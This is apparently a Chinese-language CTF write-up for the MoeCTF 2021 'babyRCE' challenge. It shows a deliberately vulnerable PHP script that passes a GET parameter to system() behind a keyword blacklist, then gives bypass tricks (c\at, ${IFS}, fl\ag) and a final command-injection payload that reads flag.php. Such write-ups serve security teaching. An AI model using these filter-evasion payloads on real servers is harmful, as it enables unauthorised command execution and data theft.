[MoeCTF 2021]babyRCE

打开题目在线环境可以看到:

php 复制代码
<?php

$rce = $_GET['rce'];
if (isset($rce)) {
    if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
        system($rce);
    }else {
        echo "hhhhhhacker!!!"."\n";
    }
} else {
    highlight_file(__FILE__);
}

这个代码审计起来就比较简单了,这里ls没有过滤可以直接用ls命令查看**?rce=ls**

查看flag.php就能获得flag。 cat过滤 ==> c\at绕过 (可以在linux系统测试,是可以的) 空格过滤 ==>

${IFS}绕过 flag过滤 ==> fl\ag

最后的payload就是:?rce=c\at${IFS}fl\ag.php

相关推荐
AC赳赳老秦4 小时前
防火墙规则批量配置实战:OpenClaw 自动生成模板、批量下发与合规性校验全解析
java·开发语言·人工智能·python·github·php·openclaw
2502_921286076 小时前
【企业网络管理】DHCP 与 SAMBA:从协议原理到企业级实战配置全解析
开发语言·php
运维管理7 小时前
H3C SecPath W2000-G[AK]系列Web应用防火墙 典型配置举例(E6711 E6712 E6713)-6W108-H3C 官方配置
服务器·网络·php
techdashen10 小时前
kTLS 进入 rustls 组织:把 TLS 的数据面交给内核
开发语言·php
Web极客码10 小时前
在WordPress Multisite中添加超级管理员用户
服务器·php·网站
漂亮的摩托11 小时前
深感一无所长,准备试着从零开始写个富文本编辑器
开发语言·php
火星校尉11 小时前
一场数据基建与消费场景的跨界实验
java·前端·数据库·python·php
面朝大海,春不暖,花不开12 小时前
BPF与eBPF简介:核心概念与观测工具概览
开发语言·php·ebpf·bpf·性能观测
威武的花瓣14 小时前
细说ASP.NET的各种异步操作
后端·asp.net·php